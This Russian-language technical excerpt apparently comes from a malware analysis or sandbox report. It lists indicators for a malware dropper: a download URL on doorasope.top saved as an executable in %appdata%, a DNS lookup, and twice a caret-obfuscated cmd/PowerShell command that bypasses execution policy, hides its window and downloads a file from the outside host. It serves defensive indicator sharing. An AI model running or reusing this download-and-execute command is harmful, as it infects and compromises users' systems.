Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powe^rS^hEl^L.^eXE^ -ex^E^cu^T^io^n^P^OLIcy bY^PaSS^ ^-no^p^Ro^fil^e^ -w^iNdoWSty^lE^ HI^DD^En^ ^(^n^ew-Ob^J^Ect sy^S^tE^m.Ne^t^.W^E^b^CL^iE^nT^)^.doWNLoadF^Ile('http://www...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "powe^rS^hEl^L.^eXE^ -ex^E^cu^T^io^n^P^OLIcy bY^PaSS^ ^-no^p^Ro^fil^e^ -w^iNdoWSty^lE^ HI^DD^En^ ^(^n^ew-Ob^J^Ect sy^S^tE^m.Ne^t^.W^E^b^CL^iE^nT^)^.doWNLoadF^Ile('http://www...' (со скрытым окном)